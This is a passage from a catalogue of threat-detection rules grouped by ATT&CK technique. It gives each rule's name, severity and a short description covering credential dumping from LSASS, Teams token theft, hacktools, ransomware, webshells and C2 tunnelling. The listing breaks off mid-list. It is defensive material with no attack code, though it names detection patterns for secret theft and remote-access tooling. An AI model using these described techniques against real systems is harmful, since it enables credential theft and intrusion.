  • Suspicious Teams Application Related ObjectAcess Event - Level: high
    Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
  • Microsoft Teams Sensitive File Access By Uncommon Applications - Level: medium
    Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
  • HackTool - Koh Default Named Pipe - Level: critical
    Description: Detects creation of default named pipes used by the Koh tool
  • Renamed BrowserCore.EXE Execution - Level: high
    Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
  • Potentially Suspicious JWT Token Search Via CLI - Level: medium
    Description: Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.
  • Potentially Suspicious Command Targeting Teams Sensitive Files - Level: medium
    Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.
attack.t1106 16
Show Rules (16)
  • Lazarus Activity Apr21 - Level: high
    Description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
  • TA505 Dropper Load Pattern - Level: critical
    Description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
  • BPFDoor Abnormal Process ID or Lock File Accessed - Level: high
    Description: detects BPFDoor .lock and .pid files access in temporary file storage facility
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Potential WinAPI Calls Via PowerShell Scripts - Level: high
    Description: Detects use of WinAPI functions in PowerShell scripts
  • HackTool - CobaltStrike BOF Injection Pattern - Level: high
    Description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes
  • HackTool - HandleKatz Duplicating LSASS Handle - Level: high
    Description: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
  • Potential Direct Syscall of NtOpenProcess - Level: medium
    Description: Detects potential calls to NtOpenProcess directly from NTDLL.
  • Potential Binary Proxy Execution Via Cdb.EXE - Level: medium
    Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
  • HackTool - RedMimicry Winnti Playbook Execution - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Mshta.EXE Execution Patterns - Level: high
    Description: Detects suspicious mshta process execution patterns
  • Potential WinAPI Calls Via CommandLine - Level: high
    Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
  • Turla Group Named Pipes - Level: critical
    Description: Detects a named pipe used by Turla group samples
  • WinAPI Library Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • WinAPI Function Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
attack.t1018 16
Show Rules (16)
  • Correct Execution of Nltest.exe - Level: high
    Description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
  • Linux Remote System Discovery - Level: low
    Description: Detects the enumeration of other remote systems.
  • Macos Remote System Discovery - Level: informational
    Description: Detects the enumeration of other remote systems.
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • DirectorySearcher Powershell Exploitation - Level: medium
    Description: Enumerates Active Directory to determine computers that are joined to the domain
  • Active Directory Computers Enumeration With Get-AdComputer - Level: low
    Description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.
  • Share And Session Enumeration Using Net.EXE - Level: low
    Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
  • Nltest.EXE Execution - Level: low
    Description: Detects nltest commands that can be used for information discovery
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • PUA - Adidnsdump Execution - Level: low
    Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.
  • Suspicious Scan Loop Network - Level: medium
    Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1566 15
Show Rules (15)
  • Search-ms and WebDAV Suspicious Indicators in URL - Level: high
    Description: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.
  • Potential Malicious Usage of CloudTrail System Manager - Level: high
    Description: Detect when System Manager successfully executes commands against an instance.
  • Okta FastPass Phishing Detection - Level: high
    Description: Detects when Okta FastPass prevents a known phishing site.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Download From Suspicious TLD - Blacklist - Level: low
    Description: Detects download of certain file types from hosts in suspicious TLDs
  • Download From Suspicious TLD - Whitelist - Level: low
    Description: Detects executable downloads from suspicious remote systems
  • Suspicious External WebDAV Execution - Level: high
    Description: Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious Microsoft OneNote Child Process - Level: high
    Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
  • Phishing Pattern ISO in Archive - Level: high
    Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • WebDAV Temporary Local File Creation - Level: medium
    Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
attack.s0002 15
Show Rules (15)
  • Credential Dumping Tools Accessing LSASS Memory - Level: high
    Description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
  • Mimikatz Detection LSASS Access - Level: high
    Description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • Mimikatz DC Sync - Level: high
    Description: Detects Mimikatz DC sync security events
  • Successful Overpass the Hash Attempt - Level: high
    Description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.
  • HackTool - Generic Process Access - Level: high
    Description: Detects process access requests from hacktool processes based on their default image name
  • LSASS Memory Access by Tool With Dump Keyword In Name - Level: high
    Description: Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
  • Potential Credential Dumping Activity Via LSASS - Level: medium
    Description: Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • Potentially Suspicious GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access requests to LSASS process with potentially suspicious access flags
  • Credential Dumping Attempt Via WerFault - Level: high
    Description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
  • LSASS Access From Potentially White-Listed Processes - Level: high
    Description: Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
  • LSASS Access From Program In Potentially Suspicious Folder - Level: medium
    Description: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder
  • Uncommon GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
  • Mimikatz In-Memory - Level: medium
    Description: Detects certain DLL loads when Mimikatz gets executed
attack.t1016 15
Show Rules (15)
  • Correct Execution of Nltest.exe - Level: high
    Description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
  • OpenCanary - SNMP OID Request - Level: high
    Description: Detects instances where an SNMP service on an OpenCanary node has had an OID request.
  • System Network Discovery - Linux - Level: informational
    Description: Detects enumeration of local network configuration
  • System Network Discovery - macOS - Level: informational
    Description: Detects enumeration of local network configuration
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Suspicious Network Connection to IP Lookup Service APIs - Level: medium
    Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
  • Firewall Configuration Discovery Via Netsh.EXE - Level: low
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Nltest.EXE Execution - Level: low
    Description: Detects nltest commands that can be used for information discovery
  • Potential Recon Activity Via Nltest.EXE - Level: medium
    Description: Detects nltest commands that can be used for information discovery
  • Suspicious Network Command - Level: low
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
  • Userdomain Variable Enumeration - Level: low
    Description: Detects suspicious enumeration of the domain the user is associated with.
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet - Level: low
    Description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
  • Potential Network Enumeration on AWS - Level: low
    Description: Detects network enumeration performed on AWS.
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1133 15
Show Rules (15)
  • OpenCanary - SSH Login Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
  • OpenCanary - SSH New Connection Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
  • OpenCanary - Telnet Login Attempt - Level: high
    Description: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
  • Remote Access Tool - Team Viewer Session Started On Linux Host - Level: low
    Description: Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
  • Remote Access Tool - Team Viewer Session Started On MacOS Host - Level: low
    Description: Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
  • External Remote RDP Logon from Public IP - Level: medium
    Description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
  • External Remote SMB Logon from Public IP - Level: high
    Description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
  • Failed Logon From Public IP - Level: medium
    Description: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
  • Unusual File Modification by dns.exe - Level: high
    Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
  • Unusual File Deletion by Dns.exe - Level: high
    Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
  • Unusual Child Process of dns.exe - Level: high
    Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
  • Remote Access Tool - ScreenConnect Installation Execution - Level: medium
    Description: Detects ScreenConnect program starts that establish a remote access to a system.
  • Remote Access Tool - Team Viewer Session Started On Windows Host - Level: low
    Description: Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
  • User Added to Remote Desktop Users Group - Level: high
    Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
  • Running Chrome VPN Extensions via the Registry 2 VPN Extension - Level: high
    Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension
attack.t1486 15
Show Rules (15)
  • Antivirus Ransomware Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • AWS EC2 Disable EBS Encryption - Level: medium
    Description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.
  • Microsoft 365 - Potential Ransomware Activity - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.
  • Suspicious Creation TXT File in User Desktop - Level: high
    Description: Ransomware create txt file in the user Desktop
  • Suspicious Appended Extension - Level: medium
    Description: Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.
  • Load Of RstrtMgr.DLL By A Suspicious Process - Level: high
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
  • Load Of RstrtMgr.DLL By An Uncommon Process - Level: low
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
  • Portable Gpg.EXE Execution - Level: medium
    Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
  • Suspicious Reg Add BitLocker - Level: high
    Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
  • Renamed Gpg.EXE Execution - Level: high
    Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • LockerGoga Ransomware Activity - Level: critical
    Description: Detects LockerGoga ransomware activity via specific command line.
  • Potential Conti Ransomware Activity - Level: critical
    Description: Detects a specific command used by the Conti ransomware group
  • BlueSky Ransomware Artefacts - Level: high
    Description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
  • Suspicious Multiple File Rename Or Delete Occurred - Level: medium
    Description: Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).
attack.t1046 15
Show Rules (15)
  • Linux Network Service Scanning - Auditd - Level: low
    Description: Detects enumeration of local or remote network services.
  • Pnscan Binary Data Transmission Activity - Level: medium
    Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
  • Linux Network Service Scanning Tools Execution - Level: low
    Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
  • MacOS Network Service Scanning - Level: low
    Description: Detects enumeration of local or remote network services.
  • Advanced IP Scanner - File Event - Level: medium
    Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
  • Python Initiated Connection - Level: medium
    Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • HackTool - winPEAS Execution - Level: high
    Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • PUA - Advanced IP Scanner Execution - Level: medium
    Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
  • PUA - Advanced Port Scanner Execution - Level: medium
    Description: Detects the use of Advanced Port Scanner.
  • PUA - SoftPerfect Netscan Execution - Level: medium
    Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
  • PUA - Nmap/Zenmap Execution - Level: medium
    Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
  • Network Scans Count By Destination IP - Level: medium
    Description: Detects many failed connection attempts to different ports or hosts
  • Network Scans Count By Destination Port - Level: medium
    Description: Detects many failed connection attempts to different ports or hosts
attack.t1210 15
Show Rules (15)
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Apache Threading Error - Level: medium
    Description: Detects an issue in apache logs that reports threading related errors
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln - Level: high
    Description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
  • Zerologon Exploitation Using Well-known Tools - Level: critical
    Description: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.
  • Potential RDP Exploit CVE-2019-0708 - Level: medium
    Description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
  • DNS Query Request By QuickAssist.EXE - Level: low
    Description: Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
  • HackTool - SharpWSUS/WSUSpendu Execution - Level: high
    Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
  • Suspicious SysAidServer Child - Level: medium
    Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
  • Terminal Service Process Spawn - Level: high
    Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC - Level: high
    Description: Detects the execution of the commonly used ZeroLogon PoC executable.
  • Possible Exploitation of Exchange RCE CVE-2021-42321 - Level: high
    Description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
  • Potential CVE-2023-46214 Exploitation Attempt - Level: medium
    Description: Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code - Level: high
    Description: Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
attack.s0029 14
Show Rules (14)
  • PsExec Tool Execution - Level: low
    Description: Detects PsExec service execution via default service image name
  • PsExec Service Start - Level: low
    Description: Detects a PsExec service start
  • HackTool Service Registration or Execution - Level: high
    Description: Detects installation or execution of services
  • PsExec Service Installation - Level: medium
    Description: Detects PsExec service installation and execution events
  • CSExec Service File Creation - Level: medium
    Description: Detects default CSExec service filename which indicates CSExec service installation and execution
  • RemCom Service File Creation - Level: medium
    Description: Detects default RemCom service filename which indicates RemCom service installation and execution
  • PsExec Service File Creation - Level: low
    Description: Detects default PsExec service filename which indicates PsExec service installation and execution
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • PsExec Tool Execution From Suspicious Locations - PipeName - Level: medium
    Description: Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack
  • PUA - NirCmd Execution - Level: medium
    Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
  • PUA - NirCmd Execution As LOCAL SYSTEM - Level: high
    Description: Detects the use of NirCmd tool for command execution as SYSTEM user
  • PUA - NSudo Execution - Level: high
    Description: Detects the use of NSudo tool for command execution
  • PUA - RunXCmd Execution - Level: high
    Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
  • PsExec Default Named Pipe - Level: low
    Description: Detects PsExec service default pipe creation
attack.t1102 13
Show Rules (13)
  • Suspicious Non-Browser Network Communication With Reddit API - Level: medium
    Description: Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
  • Communication To LocaltoNet Tunneling Service Initiated - Linux - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process - Level: medium
    Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
  • New Connection Initiated To Potential Dead Drop Resolver Domain - Level: high
    Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
  • Suspicious Non-Browser Network Communication With Google API - Level: medium
    Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
  • Communication To LocaltoNet Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
  • Potentially Suspicious Network Connection To Notion API - Level: low
    Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
  • Suspicious Non-Browser Network Communication With Telegram API - Level: medium
    Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
  • Cloudflared Tunnel Connections Cleanup - Level: medium
    Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
  • Cloudflared Tunnel Execution - Level: medium
    Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
  • Suspicious Child Process Of Manage Engine ServiceDesk - Level: high
    Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
attack.t1485 13
Show Rules (13)
  • Run from a Zip File - Level: medium
    Description: Payloads may be compressed, archived, or encrypted in order to avoid detection
  • AWS EFS Fileshare Mount Modified or Deleted - Level: medium
    Description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.
  • AWS EKS Cluster Created or Deleted - Level: low
    Description: Identifies when an EKS cluster is created or deleted.
  • Azure Device or Configuration Modified or Deleted - Level: medium
    Description: Identifies when a device or device configuration in azure is modified or deleted.
  • Microsoft 365 - Unusual Volume of File Deletion - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.
  • Overwriting the File with Dev Zero or Null - Level: low
    Description: Detects overwriting (effectively wiping/deleting) of a file.
  • DD File Overwrite - Level: low
    Description: Detects potential overwriting and deletion of a file using DD.
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
  • Deleted Data Overwritten Via Cipher.EXE - Level: medium
    Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
  • Fsutil Suspicious Invocation - Level: high
    Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).
  • Renamed Sysinternals Sdelete Execution - Level: high
    Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
  • Potential File Overwrite Via Sysinternals SDelete - Level: high
    Description: Detects the use of SDelete to erase a file not the free space
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
attack.t1053 13
Show Rules (13)
  • Abusing Windows Telemetry For Persistence - Registry - Level: high
    Description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
  • Remote Schedule Task Lateral Movement via ATSvc - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task
  • Remote Schedule Task Lateral Movement via SASec - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via SASec
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
  • Suspicious Scheduled Task Write to System32 Tasks - Level: high
    Description: Detects the creation of tasks from processes executed from suspicious locations
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - SharPersist Execution - Level: high
    Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
  • Scheduled TaskCache Change by Uncommon Program - Level: high
    Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
  • Defrag Deactivation - Security - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • Potential ACTINIUM Persistence Activity - Level: high
    Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
attack.t1556 13
Show Rules (13)
  • AWS Identity Center Identity Provider Change - Level: high
    Description: Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
  • Disabled MFA to Bypass Authentication Mechanisms - Level: medium
    Description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.
  • CA Policy Removed by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes where non approved actor removed CA Policy.
  • CA Policy Updated by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.
  • Certificate-Based Authentication Enabled - Level: medium
    Description: Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.
  • New Root Certificate Authority Added - Level: medium
    Description: Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
  • Change to Authentication Method - Level: medium
    Description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
  • User Added To Group With CA Policy Modification Access - Level: medium
